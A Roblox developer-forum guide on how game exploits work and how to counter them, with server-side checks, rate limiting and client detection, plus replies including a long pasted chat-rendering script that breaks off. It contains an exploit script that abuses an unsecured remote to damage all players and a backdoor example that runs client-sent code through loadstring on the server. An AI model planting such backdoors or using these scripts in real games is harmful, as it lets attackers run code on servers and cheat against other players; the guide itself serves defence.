How exploits work and how to combat them

Note: I will still add more, I’m just too busy to focus on this right now

Hello, I’m dand, I’ve been scripting for over a year on roblox and have a specific interests in exploits and how they work. So I want to share my knowledge here.

Introduction

I’ve seen a lot of posts on the dev forum recently about exploit related topics not knowing much about them themselves.

So I suggest reading this small little guide to help people understand.

(If you’re looking for a more in depth guide this isn’t the post for you)

What is an exploit?

Well there a few definitions, the one that mainly fits roblox’s definition is,

“A 3rd party program that can alter a client’s behaviour to give an unfair advantage against other players”.

Pretty simple. Most of these exploits allow for people to execute scripts and code on the client with the use of Injectors. Many famous injectors are Krnl, Synapse X and many more some better than others. This is possible because roblox loads a lot of data onto the client to give the in game experience you get to see.

What is a client?

A client is your PC. When you join a roblox server the server gives you an associated Player Instance. Data is then loaded onto your PC so you can walk, run, chat and interact with the world around you. Of course having this loaded onto your PC is a dead giveaway that people can tamper and mess with it. And you can’t blame them, it is their PC after all. Local scripts run on the client

Now how do you combat with people changing stats and values on their PC?

As far back as 2017? Or later (someone correct me on this), roblox added a new property to workspace called FilteringEnabled which you could toggle on and off. (It is now since deprecated)

What is FilteringEnabled?

When toggled on FilteringEnabled stopped client sided changes from replicating to the server. (So if you changed something on your client, noone else would see the effect), This was a lot better but limitted communication between Client and Server, which introduced Remotes which could send data between the two.

This was a massive breakthrough as any games that enabled FilteringEnabled wouldn’t be as affected by exploiters as before. This is also why most old games that don’t have it enabled have so many exploiters.

How do exploits work then?

Well if you delete a part on the client and it doesn’t change for anyone else, whats the point?

Server sided: Some aspects are still replicated to the server from the client, such as the following;

  • Character movements still get replicated from client to server and since the movements were handled on the client this allowed for exploits to create Character Physic Based exploits, which included flight, speed, jump, noclip and fling exploits.

  • Remotes, Used to send data to the server from the client and vice versa, was also exploited by many and poor remote security is the main cause for exploits that could affect other players and give the exploiter an unfair advantage.

Client sided: some of these fool the client into sending false data to the server;

  • Input based exploits allow for the client to basically run like a robot. Mainly used in FPS or any kind of shooter game, such as aimbot which is unfair to the rest of the human players.

  • Environment, Since the client controllers everything loaded onto it, it can also make unwanted changes, a main example is a hitbox extender, making a head bigger so its way easier to hit. Another example is deleting walls so you can get to a locked off area.

ServerSides

Most Server sided exploits can be detected with some extra security. The server is different to the client and cannot be modified by a client since it is not loaded onto someone’s PC but kept in roblox’s HQ to communicate data between clients to make a game run. Server Sided are normally the case of bad security especially with remotes, lets take an example.

Lets say you have a FPS game and you have a gun that fires an event called Fire to tell the server to shoot from the barrel of the gun to the mouse position.

LocalScript

local mouse = game.Players.LocalPlayer:GetMouse()

local Gun = script.Parent

local FireRemote = game.ReplicatedStorage.Fire

Gun.Activated:Connect(function() -- When gun is clicked
  FireRemote:FireServer(Gun.Barrel.Position, mouse.Hit.p) -- tell server to fire
end)

Tells the server to fire from the barrel to where the mouse is aiming
image

ServerScript

local FireRemote = game.ReplicatedStorage.Fire

FireRemote.OnServerEvent:Connect(function(player, origin, aim) -- when told to fire
  -- (not going to include raycast calcuations since its off topic
  if hit and hit.Parent:FindFirstChild('Humanoid') then
    hit.Parent.Humanoid:TakeDamage(20) -- damage player by 20
  end
end)

Now if you are experienced with scripting you’ll know this is really vunerable to exploits with a basic script

Exploit Script

local player = game.Players.LocalPlayer
local event = game.ReplicatedStorage.Fire

while task.wait() do -- loop
  for i,v in pairs(game.Players:GetPlayers()) do -- go through each player
    if v ~= player and v.Character then 
       -- tell server to shoot player directly from above
       event:FireServer(v.Character.HumanoidRootPart.Position + Vector3.new(0,3,0), v.Character.HumanoidRootPart.Position)
    end
  end
end

This basically is visuallised like so

image

Shoot from above down onto the player.

How could we fix this?

Simple server checks

  1. Remove the origin parameter since that can be spoofed easily by the client.
  2. Replace it with a gun parameter since its harder to spoof something that already exists on the server.
  3. Check these with a simple if statement to make sure the gun exists and is equipped.

ServerScript

FireRemote.OnServerEvent:Connect(function(player, gun, aim)
  if gun then -- checks if it exists on the server
    if player.Character:FindFirstChild(gun.Name) then -- assure the gun is equiped
      local origin = gun.Barrel.Position
      -- do code
    end
  end
end)

LocalScript

FireRemote:FireServer(Gun, mouse.Hit.p)

This is just simple server checking and should be normalised when handling events to keep them secure from exploiters

Rate protection

This part is a bit more advanced as it consists of further scripting knowledge.

This method using time tracking methods tick() to detect if a remote is being fired way more than normally. Of course if you have a local script that fires remote events rapidly, this is useless.

local event = -- define event

local minimum_time = .1
local last_times_fired = {}

event.OnServerEvent:Connect(function(player)
  local last_fired = last_times_fired[player] -- gets last time player fired

  if last_fired then -- if fired before
    local since = last_fired - tick() -- time since then
    if since < minimum_time then -- if time since is smaller than the min allowed
      return player:Kick('Remote rates too high') -- kick player
    end
  end
  last_times_fired[player] = tick() -- set this for the next time its fired
end)

ClientSides

Client sides are when anti exploits are kept on the client to detect changes and unexpected behaviour to determine if someone is expoiting or not.

This can be very useful though because of its effectiveness against unexperienced exploiters who are mainly refferred to as “skids” or script kiddies. These people just copy scripts online with no knowledge about coding at all and use them in games. This suprisingly is a wide majority of the exploiting community.

While this is all good DO NOT RELY ON IT. If your entire anticheat is based on the client any experienced exploiter could easily destroy it since exploits has complete control over the client and the scripts that run on it.

Examples

What you need to remember is that when WalkSpeed gets changed the property doesn’t change on the server but since (as stated above) movement is handled to the client and replicated to the server. So whilst it might say 16 WalkSpeed on the server, if on the client its 72 it will move like its 72.

(blue is client, green is server)

LocalScript

local player = game.Players.LocalPlayer

player.CharacterAdded:Connect(function(char)
  local hum = char:WaitForChild('Humanoid')
  hum:GetPropertyChangedSignal('WalkSpeed')
    if hum.WalkSpeed > 16 then
      player:Kick('hacking')
    end
  end)
end)

You could use this for any property you don’t wanna be changed but it can be easily bypassed.

Such as deletion

Memory Usage Method

A widely used and known method is detecting Memory Usage spikes.

Basically how these work is by detecting if the Memory Usage randomly spikes too high. This is useful since when exploits are injected they take up a lot of memory at once, spiking the MemoryUsage.

Client memory usage can be found by pressing F9 when in game.
image

The method includes .RenderStepped since it needs to check very frequently

local RunService = game:GetService('RunService')
local Stats = game:GetService('Stats')

local spike_limit = 200

local old_usage
RunService.RenderStepped:Connect(function()
  local usage = Stats:GetTotalMemoryUsageMb()
  if old_usage and usage - old_usage > spike_limit then
    game.Players.LocalPlayer:Kick()
  end
  old_usage = usage
end)

This is useful since it detects on injection before the player can modify its client so they can’t delete the script.

BE CAREFUL
If your game is intense on part count or is very big it is bound to have memory spikes which can cause false positives when a player can be kicked for no reason.

The War on Anti-Cheats

Since there has been a war between exploiters and game developers for ages a lot of methods have been created by exploiters to combat anticheats and most of these methods are the reason Client-Sided anticheats are useless. Most of these methods are quite advanced so I would suggest skipping if you’re not experienced with lua.

Hooking

In simple terms hooking is just altering the behaviour of Instance’s metatables.

If you don’t know metatables then I suggest skipping this part, but basically they are tables that give seemingly empty tables unique behaviour that are attached to one with setmetatable(table, metatable). This behaviour is easily altered by exploiters and can disable Events, Spoof properties and hide instances

Since I’m not too experienced with this, theres a really good guide that goes into a lot more detail.

Custom Functions

Injectors support many types of functions that aren’t in roblox or even in lua, some of these functions are to make it harder to create an effiecient ClientSided anti cheat and in some cases, ServerSides aswell.

One of the most used methods is getnilinstances() which isn’t in luau but is implemented into exploits like KRNL and Synapse. This method returns an array of Instances which parent’s are set to nil. This also includes Destroyed Instances since they also get pareneted to nil until being deleted by the GC. This is why anti cheats that parent to nil seem effective to hide from the exploiter, but instead it is made useless by this method.

There are more methods like getrawmetatable() that return the metatable of any userdata or table even if the __metatable metamethod is set to something else to misdirect the client. This is used for Hooking which is mentioned above.

There is also GetObjects() that return all the objects on the client into one array in no particular order which also makes hiding anti-cheats useless.

I would send a link to more documentation but they lead to shady sites that surround the exploiting community and I will probably get flagged.

Backdoors

Ah yes backdoors, the number one reason free models are frowned upon and probably the most dangerous exploits to have in your game. But is also really easy to avoid.

So what are backdoors?

Backdoors are the roblox version of a Trojan virus. They hide in public models (mainly free models) until aded into a game and are told they are important to the model and run malicous code to destroy servers to give the client access to the server.

An example could be a tree with a script inside that says it makes the leaves blow about realistically bu in reality it creates a remote so a client can join and send code directly to the server to be executed.

ServerScript – inside of model

local remote = Instance.new('RemoteEvent')
remote.Name = 'exe'
remote.Parent = game.ReplicatedStorage

remote.OnServerEvent:Connect(function(player, code)
  return loadstring(code)() -- allows string to be turned into code and ran
end

ExploiterScript

game.ReplicatedStorage.exe:FireServer('workspace:ClearAllChildren()')

This would run workspace:ClearAllChildren() on the server and the entire server would be affected.

Luckily backdoors have become less of a danger due to plugins such as RoDefender and studio’s new prompt when inserting a model with scripts inside. Basically just be careful with free models.

Conclusion

Some good tips to take from this.

  • Never trust the client.
  • Check free models.
  • Add server security where you can.

This is my biggest post so far so please correct me on any mistakes and feel free to add your own methods/opinions below!

Thanks for reading,

dand

P.S: I will edit this post from time to time so please suggest stuff to add

74 Likes

Very useful and detailed guide, but i suggest you to change the title of this post.
It seems like you are teaching other “how to exploit” when looking at the title for the first time.

5 Likes

Can this be used by exploits to execute full code or short lines?

(That is, how many lines of code can the exploiter load in that way?)

e.g:

Small Code:

while true do 
	wait()
	
	game.Players.LocalPlayer.leaderstats.Money.Value = game.Players.LocalPlayer.leaderstats.Money.Value + 1
	
end

Full Code:

--[[
	// FileName: BubbleChat.lua
	// Written by: jeditkacheff, TheGamer101
	// Description: Code for rendering bubble chat
]]

--[[ SERVICES ]]
local PlayersService = game:GetService('Players')
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local ChatService = game:GetService("Chat")
local TextService = game:GetService("TextService")
--[[ END OF SERVICES ]]

local LocalPlayer = PlayersService.LocalPlayer
while LocalPlayer == nil do
	PlayersService.ChildAdded:wait()
	LocalPlayer = PlayersService.LocalPlayer
end

local PlayerGui = LocalPlayer:WaitForChild("PlayerGui")

local success, UserShouldLocalizeGameChatBubble = pcall(function()
	return UserSettings():IsUserFeatureEnabled("UserShouldLocalizeGameChatBubble")
end)
local UserShouldLocalizeGameChatBubble = success and UserShouldLocalizeGameChatBubble

local UserFixBubbleChatText do
	local success, value = pcall(function()
		return UserSettings():IsUserFeatureEnabled("UserFixBubbleChatText")
	end)
	UserFixBubbleChatText = success and value
end

local UserRoactBubbleChatBeta do
	local success, value = pcall(function()
		return UserSettings():IsUserFeatureEnabled("UserRoactBubbleChatBeta")
	end)
	UserRoactBubbleChatBeta = success and value
end

local UserPreventOldBubbleChatOverlap do
	local success, value = pcall(function()
		return UserSettings():IsUserFeatureEnabled("UserPreventOldBubbleChatOverlap")
	end)
	UserPreventOldBubbleChatOverlap = success and value
end

local function getMessageLength(message)
	return utf8.len(utf8.nfcnormalize(message))
end

--[[ SCRIPT VARIABLES ]]
local CHAT_BUBBLE_FONT = Enum.Font.SourceSans
local CHAT_BUBBLE_FONT_SIZE = Enum.FontSize.Size24 -- if you change CHAT_BUBBLE_FONT_SIZE_INT please change this to match
local CHAT_BUBBLE_FONT_SIZE_INT = 24 -- if you change CHAT_BUBBLE_FONT_SIZE please change this to match
local CHAT_BUBBLE_LINE_HEIGHT = CHAT_BUBBLE_FONT_SIZE_INT + 10
local CHAT_BUBBLE_TAIL_HEIGHT = 14
local CHAT_BUBBLE_WIDTH_PADDING = 30
local CHAT_BUBBLE_PADDING = 12
local CHAT_BUBBLE_FADE_SPEED = 1.5

local BILLBOARD_MAX_WIDTH = 400
local BILLBOARD_MAX_HEIGHT = 250	--This limits the number of bubble chats that you see above characters

local ELIPSES = "..."
local MaxChatMessageLength = 128 -- max chat message length, including null terminator and elipses.
local MaxChatMessageLengthExclusive = MaxChatMessageLength - getMessageLength(ELIPSES) - 1

local NEAR_BUBBLE_DISTANCE = 65	--previously 45
local MAX_BUBBLE_DISTANCE = 100	--previously 80

--[[ END OF SCRIPT VARIABLES ]]


-- [[ SCRIPT ENUMS ]]
local BubbleColor = {	WHITE = "dub",
					BLUE = "blu",
					GREEN = "gre",
					RED = "red" }

--[[ END OF SCRIPT ENUMS ]]

-- This screenGui exists so that the billboardGui is not deleted when the PlayerGui is reset.
local BubbleChatScreenGui = Instance.new("ScreenGui")
BubbleChatScreenGui.Name = "BubbleChat"
BubbleChatScreenGui.ResetOnSpawn = false
BubbleChatScreenGui.Parent = PlayerGui

--[[ FUNCTIONS ]]

local function lerpLength(msg, min, max)
	return min + (max - min) * math.min(getMessageLength(msg) / 75.0, 1.0)
end

local function createFifo()
	local this = {}
	this.data = {}

	local emptyEvent = Instance.new("BindableEvent")
	this.Emptied = emptyEvent.Event

	function this:Size()
		return #this.data
	end

	function this:Empty()
		return this:Size() <= 0
	end

	function this:PopFront()
		table.remove(this.data, 1)
		if this:Empty() then emptyEvent:Fire() end
	end

	function this:Front()
		return this.data[1]
	end

	function this:Get(index)
		return this.data[index]
	end

	function this:PushBack(value)
		table.insert(this.data, value)
	end

	function this:GetData()
		return this.data
	end

	return this
end

local function createCharacterChats()
	local this = {}

	this.Fifo = createFifo()
	this.BillboardGui = nil

	return this
end

local function createMap()
	local this = {}
	this.data = {}
	local count = 0

	function this:Size()
		return count
	end

	function this:Erase(key)
		if this.data[key] then count = count - 1 end
		this.data[key] = nil
	end

	function this:Set(key, value)
		this.data[key] = value
		if value then count = count + 1 end
	end

	function this:Get(key)
		if not key then return end
		if not this.data[key] then
			this.data[key] = createCharacterChats()
			local emptiedCon = nil
			emptiedCon = this.data[key].Fifo.Emptied:connect(function()
				emptiedCon:disconnect()
				this:Erase(key)
			end)
		end
		return this.data[key]
	end

	function this:GetData()
		return this.data
	end

	return this
end

local function createChatLine(message, bubbleColor, isLocalPlayer)
	local this = {}

	function this:ComputeBubbleLifetime(msg, isSelf)
		if isSelf then
			return lerpLength(msg, 8, 15)
		else
			return lerpLength(msg, 12, 20)
		end
	end

	this.Origin = nil
	this.RenderBubble = nil
	this.Message = message
	this.BubbleDieDelay = this:ComputeBubbleLifetime(message, isLocalPlayer)
	this.BubbleColor = bubbleColor
	this.IsLocalPlayer = isLocalPlayer

	return this
end

local function createPlayerChatLine(player, message, isLocalPlayer)
	local this = createChatLine(message, BubbleColor.WHITE, isLocalPlayer)

	if player then
		this.User = player.Name
		this.Origin = player.Character
	end

	return this
end

local function createGameChatLine(origin, message, isLocalPlayer, bubbleColor)
	local this = createChatLine(message, bubbleColor, isLocalPlayer)
	this.Origin = origin

	return this
end

function createChatBubbleMain(filePrefix, sliceRect)
	local chatBubbleMain = Instance.new("ImageLabel")
	chatBubbleMain.Name = "ChatBubble"
	chatBubbleMain.ScaleType = Enum.ScaleType.Slice
	chatBubbleMain.SliceCenter = sliceRect
	chatBubbleMain.Image = "rbxasset://textures/" .. tostring(filePrefix) .. ".png"
	chatBubbleMain.BackgroundTransparency = 1
	chatBubbleMain.BorderSizePixel = 0
	chatBubbleMain.Size = UDim2.new(1.0, 0, 1.0, 0)
	chatBubbleMain.Position = UDim2.new(0, 0, 0, 0)

	return chatBubbleMain
end

function createChatBubbleTail(position, size)
	local chatBubbleTail = Instance.new("ImageLabel")
	chatBubbleTail.Name = "ChatBubbleTail"
	chatBubbleTail.Image = "rbxasset://textures/ui/dialog_tail.png"
	chatBubbleTail.BackgroundTransparency = 1
	chatBubbleTail.BorderSizePixel = 0
	chatBubbleTail.Position = position
	chatBubbleTail.Size = size

	return chatBubbleTail
end

function createChatBubbleWithTail(filePrefix, position, size, sliceRect)
	local chatBubbleMain = createChatBubbleMain(filePrefix, sliceRect)

	local chatBubbleTail = createChatBubbleTail(position, size)
	chatBubbleTail.Parent = chatBubbleMain

	return chatBubbleMain
end

function createScaledChatBubbleWithTail(filePrefix, frameScaleSize, position, sliceRect)
	local chatBubbleMain = createChatBubbleMain(filePrefix, sliceRect)

	local frame = Instance.new("Frame")
	frame.Name = "ChatBubbleTailFrame"
	frame.BackgroundTransparency = 1
	frame.SizeConstraint = Enum.SizeConstraint.RelativeXX
	frame.Position = UDim2.new(0.5, 0, 1, 0)
	frame.Size = UDim2.new(frameScaleSize, 0, frameScaleSize, 0)
	frame.Parent = chatBubbleMain

	local chatBubbleTail = createChatBubbleTail(position, UDim2.new(1, 0, 0.5, 0))
	chatBubbleTail.Parent = frame

	return chatBubbleMain
end

function createChatImposter(filePrefix, dotDotDot, yOffset)
	local result = Instance.new("ImageLabel")
	result.Name = "DialogPlaceholder"
	result.Image = "rbxasset://textures/" .. tostring(filePrefix) .. ".png"
	result.BackgroundTransparency = 1
	result.BorderSizePixel = 0
	result.Position = UDim2.new(0, 0, -1.25, 0)
	result.Size = UDim2.new(1, 0, 1, 0)

	local image = Instance.new("ImageLabel")
	image.Name = "DotDotDot"
	image.Image = "rbxasset://textures/" .. tostring(dotDotDot) .. ".png"
	image.BackgroundTransparency = 1
	image.BorderSizePixel = 0
	image.Position = UDim2.new(0.001, 0, yOffset, 0)
	image.Size = UDim2.new(1, 0, 0.7, 0)
	image.Parent = result

	return result
end


local this = {}
this.ChatBubble = {}
this.ChatBubbleWithTail = {}
this.ScalingChatBubbleWithTail = {}
this.CharacterSortedMsg = createMap()

-- init chat bubble tables
local function initChatBubbleType(chatBubbleType, fileName, imposterFileName, isInset, sliceRect)
	this.ChatBubble[chatBubbleType] = createChatBubbleMain(fileName, sliceRect)
	this.ChatBubbleWithTail[chatBubbleType] = createChatBubbleWithTail(fileName, UDim2.new(0.5, -CHAT_BUBBLE_TAIL_HEIGHT, 1, isInset and -1 or 0), UDim2.new(0, 30, 0, CHAT_BUBBLE_TAIL_HEIGHT), sliceRect)
	this.ScalingChatBubbleWithTail[chatBubbleType] = createScaledChatBubbleWithTail(fileName, 0.5, UDim2.new(-0.5, 0, 0, isInset and -1 or 0), sliceRect)
end

initChatBubbleType(BubbleColor.WHITE,	"ui/dialog_white",	"ui/chatBubble_white_notify_bkg", 	false,	Rect.new(5,5,15,15))
initChatBubbleType(BubbleColor.BLUE,	"ui/dialog_blue",	"ui/chatBubble_blue_notify_bkg",	true, 	Rect.new(7,7,33,33))
initChatBubbleType(BubbleColor.RED,		"ui/dialog_red",	"ui/chatBubble_red_notify_bkg",		true,	Rect.new(7,7,33,33))
initChatBubbleType(BubbleColor.GREEN,	"ui/dialog_green",	"ui/chatBubble_green_notify_bkg",	true,	Rect.new(7,7,33,33))

function this:SanitizeChatLine(msg)
	if getMessageLength(msg) > MaxChatMessageLengthExclusive then
		local byteOffset = utf8.offset(msg, MaxChatMessageLengthExclusive + getMessageLength(ELIPSES) + 1) - 1
		return string.sub(msg, 1, byteOffset)
	else
		return msg
	end
end

local function createBillboardInstance(adornee)
	local billboardGui = Instance.new("BillboardGui")
	billboardGui.Adornee = adornee
	billboardGui.Size = UDim2.new(0, BILLBOARD_MAX_WIDTH, 0, BILLBOARD_MAX_HEIGHT)
	billboardGui.StudsOffset = Vector3.new(0, 1.5, 2)
	billboardGui.Parent = BubbleChatScreenGui

	local billboardFrame = Instance.new("Frame")
	billboardFrame.Name = "BillboardFrame"
	billboardFrame.Size = UDim2.new(1, 0, 1, 0)
	billboardFrame.Position = UDim2.new(0, 0, -0.5, 0)
	billboardFrame.BackgroundTransparency = 1
	billboardFrame.Parent = billboardGui

	local billboardChildRemovedCon = nil
	billboardChildRemovedCon = billboardFrame.ChildRemoved:connect(function()
		if #billboardFrame:GetChildren() <= 1 then
			billboardChildRemovedCon:disconnect()
			billboardGui:Destroy()
		end
	end)

	this:CreateSmallTalkBubble(BubbleColor.WHITE).Parent = billboardFrame

	return billboardGui
end

function this:CreateBillboardGuiHelper(instance, onlyCharacter)
	if instance and not this.CharacterSortedMsg:Get(instance)["BillboardGui"] then
		if not onlyCharacter then
			if instance:IsA("BasePart") then
				-- Create a new billboardGui object attached to this player
				local billboardGui = createBillboardInstance(instance)
				this.CharacterSortedMsg:Get(instance)["BillboardGui"] = billboardGui
				return
			end
		end

		if instance:IsA("Model") then
			local head = instance:FindFirstChild("Head")
			if head and head:IsA("BasePart") then
				-- Create a new billboardGui object attached to this player
				local billboardGui = createBillboardInstance(head)
				this.CharacterSortedMsg:Get(instance)["BillboardGui"] = billboardGui
			end
		end
	end
end

local function distanceToBubbleOrigin(origin)
	if not origin then return 100000 end

	return (origin.Position - game.Workspace.CurrentCamera.CoordinateFrame.p).magnitude
end

local function isPartOfLocalPlayer(adornee)
	if adornee and PlayersService.LocalPlayer.Character then
		return adornee:IsDescendantOf(PlayersService.LocalPlayer.Character)
	end
end

function this:SetBillboardLODNear(billboardGui)
	local isLocalPlayer = isPartOfLocalPlayer(billboardGui.Adornee)
	billboardGui.Size = UDim2.new(0, BILLBOARD_MAX_WIDTH, 0, BILLBOARD_MAX_HEIGHT)
	billboardGui.StudsOffset = Vector3.new(0, isLocalPlayer and 1.5 or 2.5, isLocalPlayer and 2 or 0.1)
	billboardGui.Enabled = true
	local billChildren = billboardGui.BillboardFrame:GetChildren()
	for i = 1, #billChildren do
		billChildren[i].Visible = true
	end
	billboardGui.BillboardFrame.SmallTalkBubble.Visible = false
end

function this:SetBillboardLODDistant(billboardGui)
	local isLocalPlayer = isPartOfLocalPlayer(billboardGui.Adornee)
	billboardGui.Size = UDim2.new(4, 0, 3, 0)
	billboardGui.StudsOffset = Vector3.new(0, 3, isLocalPlayer and 2 or 0.1)
	billboardGui.Enabled = true
	local billChildren = billboardGui.BillboardFrame:GetChildren()
	for i = 1, #billChildren do
		billChildren[i].Visible = false
	end
	billboardGui.BillboardFrame.SmallTalkBubble.Visible = true
end

function this:SetBillboardLODVeryFar(billboardGui)
	billboardGui.Enabled = false
end

function this:SetBillboardGuiLOD(billboardGui, origin)
	if not origin then return end

	if origin:IsA("Model") then
		local head = origin:FindFirstChild("Head")
		if not head then origin = origin.PrimaryPart
		else origin = head end
	end

	local bubbleDistance = distanceToBubbleOrigin(origin)

	if bubbleDistance < NEAR_BUBBLE_DISTANCE then
		this:SetBillboardLODNear(billboardGui)
	elseif bubbleDistance >= NEAR_BUBBLE_DISTANCE and bubbleDistance < MAX_BUBBLE_DISTANCE then
		this:SetBillboardLODDistant(billboardGui)
	else
		this:SetBillboardLODVeryFar(billboardGui)
	end
end

function this:CameraCFrameChanged()
	for index, value in pairs(this.CharacterSortedMsg:GetData()) do
		local playerBillboardGui = value["BillboardGui"]
		if playerBillboardGui then this:SetBillboardGuiLOD(playerBillboardGui, index) end
	end
end

function this:CreateBubbleText(message, shouldAutoLocalize)
	local bubbleText = Instance.new("TextLabel")
	bubbleText.Name = "BubbleText"
	bubbleText.BackgroundTransparency = 1

	if UserFixBubbleChatText then
		bubbleText.Size = UDim2.fromScale(1, 1)
	else
		bubbleText.Position = UDim2.new(0, CHAT_BUBBLE_WIDTH_PADDING / 2, 0, 0)
		bubbleText.Size = UDim2.new(1, -CHAT_BUBBLE_WIDTH_PADDING, 1, 0)
	end

	bubbleText.Font = CHAT_BUBBLE_FONT
	bubbleText.ClipsDescendants = true
	bubbleText.TextWrapped = true
	bubbleText.FontSize = CHAT_BUBBLE_FONT_SIZE
	bubbleText.Text = message
	bubbleText.Visible = false
	bubbleText.AutoLocalize = shouldAutoLocalize

	if UserFixBubbleChatText then
		local padding = Instance.new("UIPadding")
		padding.PaddingTop = UDim.new(0, CHAT_BUBBLE_PADDING)
		padding.PaddingRight = UDim.new(0, CHAT_BUBBLE_PADDING)
		padding.PaddingBottom = UDim.new(0, CHAT_BUBBLE_PADDING)
		padding.PaddingLeft = UDim.new(0, CHAT_BUBBLE_PADDING)
		padding.Parent = bubbleText
	end

	return bubbleText
end

function this:CreateSmallTalkBubble(chatBubbleType)
	local smallTalkBubble = this.ScalingChatBubbleWithTail[chatBubbleType]:Clone()
	smallTalkBubble.Name = "SmallTalkBubble"
	smallTalkBubble.AnchorPoint = Vector2.new(0, 0.5)
	smallTalkBubble.Position = UDim2.new(0, 0, 0.5, 0)
	smallTalkBubble.Visible = false
	local text = this:CreateBubbleText("...")
	text.TextScaled = true
	text.TextWrapped = false
	text.Visible = true
	text.Parent = smallTalkBubble

	return smallTalkBubble
end

function this:UpdateChatLinesForOrigin(origin, currentBubbleYPos)
	local bubbleQueue = this.CharacterSortedMsg:Get(origin).Fifo
	local bubbleQueueSize = bubbleQueue:Size()
	local bubbleQueueData = bubbleQueue:GetData()
	if #bubbleQueueData <= 1 then return end

	for index = (#bubbleQueueData - 1), 1, -1 do
		local value = bubbleQueueData[index]
		local bubble = value.RenderBubble
		if not bubble then return end
		local bubblePos = bubbleQueueSize - index + 1

		if bubblePos > 1 then
			local tail = bubble:FindFirstChild("ChatBubbleTail")
			if tail then tail:Destroy() end
			local bubbleText = bubble:FindFirstChild("BubbleText")
			if bubbleText then bubbleText.TextTransparency = 0.5 end
		end

		local udimValue = UDim2.new( bubble.Position.X.Scale, bubble.Position.X.Offset,
									1, currentBubbleYPos - bubble.Size.Y.Offset - CHAT_BUBBLE_TAIL_HEIGHT)
		bubble:TweenPosition(udimValue, Enum.EasingDirection.Out, Enum.EasingStyle.Bounce, 0.1, true)
		currentBubbleYPos = currentBubbleYPos - bubble.Size.Y.Offset - CHAT_BUBBLE_TAIL_HEIGHT
	end
end

function this:DestroyBubble(bubbleQueue, bubbleToDestroy)
	if not bubbleQueue then return end
	if bubbleQueue:Empty() then return end

	local bubble = bubbleQueue:Front().RenderBubble
	if not bubble then
		bubbleQueue:PopFront()
	 	return
	end

	spawn(function()
		while bubbleQueue:Front().RenderBubble ~= bubbleToDestroy do
			wait()
		end

		bubble = bubbleQueue:Front().RenderBubble

		local timeBetween = 0
		local bubbleText = bubble:FindFirstChild("BubbleText")
		local bubbleTail = bubble:FindFirstChild("ChatBubbleTail")

		while bubble and bubble.ImageTransparency < 1 do
			timeBetween = wait()
			if bubble then
				local fadeAmount = timeBetween * CHAT_BUBBLE_FADE_SPEED
				bubble.ImageTransparency = bubble.ImageTransparency + fadeAmount
				if bubbleText then bubbleText.TextTransparency = bubbleText.TextTransparency + fadeAmount end
				if bubbleTail then bubbleTail.ImageTransparency = bubbleTail.ImageTransparency + fadeAmount end
			end
		end

		if bubble then
			bubble:Destroy()
			bubbleQueue:PopFront()
		end
	end)
end

function this:CreateChatLineRender(instance, line, onlyCharacter, fifo, shouldAutoLocalize)
	if not instance then return end

	if not this.CharacterSortedMsg:Get(instance)["BillboardGui"] then
		this:CreateBillboardGuiHelper(instance, onlyCharacter)
	end

	local billboardGui = this.CharacterSortedMsg:Get(instance)["BillboardGui"]
	if billboardGui then
		local chatBubbleRender = this.ChatBubbleWithTail[line.BubbleColor]:Clone()
		chatBubbleRender.Visible = false
		local bubbleText = this:CreateBubbleText(line.Message, shouldAutoLocalize)

		bubbleText.Parent = chatBubbleRender
		chatBubbleRender.Parent = billboardGui.BillboardFrame

		line.RenderBubble = chatBubbleRender

		local currentTextBounds = TextService:GetTextSize(
				bubbleText.Text, CHAT_BUBBLE_FONT_SIZE_INT, CHAT_BUBBLE_FONT,
				Vector2.new(BILLBOARD_MAX_WIDTH, BILLBOARD_MAX_HEIGHT))
		local numOflines = (currentTextBounds.Y / CHAT_BUBBLE_FONT_SIZE_INT)

		if UserFixBubbleChatText then
			-- Need to use math.ceil to round up on retina displays
			local width = math.ceil(currentTextBounds.X + CHAT_BUBBLE_PADDING * 2)
			local height = numOflines * CHAT_BUBBLE_LINE_HEIGHT

			-- prep chat bubble for tween
			chatBubbleRender.Size = UDim2.fromOffset(0, 0)
			chatBubbleRender.Position = UDim2.fromScale(0.5, 1)

			chatBubbleRender:TweenSizeAndPosition(
				UDim2.fromOffset(width, height),
				UDim2.new(0.5, -width / 2, 1, -height),
				Enum.EasingDirection.Out,
				Enum.EasingStyle.Elastic,
				0.1,
				true,
				function()
					bubbleText.Visible = true
				end
			)

			-- todo: remove when over max bubbles
			this:SetBillboardGuiLOD(billboardGui, line.Origin)
			this:UpdateChatLinesForOrigin(line.Origin, -height)
		else
			local bubbleWidthScale = math.max((currentTextBounds.X + CHAT_BUBBLE_WIDTH_PADDING) / BILLBOARD_MAX_WIDTH, 0.1)

			-- prep chat bubble for tween
			chatBubbleRender.Size = UDim2.new(0, 0, 0, 0)
			chatBubbleRender.Position = UDim2.new(0.5, 0, 1, 0)

			local newChatBubbleOffsetSizeY = numOflines * CHAT_BUBBLE_LINE_HEIGHT

			chatBubbleRender:TweenSizeAndPosition(UDim2.new(bubbleWidthScale, 0, 0, newChatBubbleOffsetSizeY),
													UDim2.new( (1 - bubbleWidthScale) / 2, 0, 1, -newChatBubbleOffsetSizeY),
													Enum.EasingDirection.Out, Enum.EasingStyle.Elastic, 0.1, true,
													function() bubbleText.Visible = true end)

			-- todo: remove when over max bubbles
			this:SetBillboardGuiLOD(billboardGui, line.Origin)
			this:UpdateChatLinesForOrigin(line.Origin, -newChatBubbleOffsetSizeY)
		end

		delay(line.BubbleDieDelay, function()
			this:DestroyBubble(fifo, chatBubbleRender)
		end)
	end
end

function this:OnPlayerChatMessage(sourcePlayer, message, targetPlayer)

	if not this:BubbleChatEnabled() then return end

	local localPlayer = PlayersService.LocalPlayer
	local fromOthers = localPlayer ~= nil and sourcePlayer ~= localPlayer

	local safeMessage = this:SanitizeChatLine(message)

	local line = createPlayerChatLine(sourcePlayer, safeMessage, not fromOthers)

	if sourcePlayer and line.Origin then
		local fifo = this.CharacterSortedMsg:Get(line.Origin).Fifo
		fifo:PushBack(line)
		--Game chat (badges) won't show up here
		this:CreateChatLineRender(sourcePlayer.Character, line, true, fifo, false)
	end
end

function this:OnGameChatMessage(origin, message, color)
	-- Prevents conflicts with the new bubble chat if it is enabled
	if UserRoactBubbleChatBeta or (UserPreventOldBubbleChatOverlap and ChatService.BubbleChatEnabled) then
		return
	end

	local localPlayer = PlayersService.LocalPlayer
	local fromOthers = localPlayer ~= nil and (localPlayer.Character ~= origin)

	local bubbleColor = BubbleColor.WHITE

	if color == Enum.ChatColor.Blue then bubbleColor = BubbleColor.BLUE
	elseif color == Enum.ChatColor.Green then bubbleColor = BubbleColor.GREEN
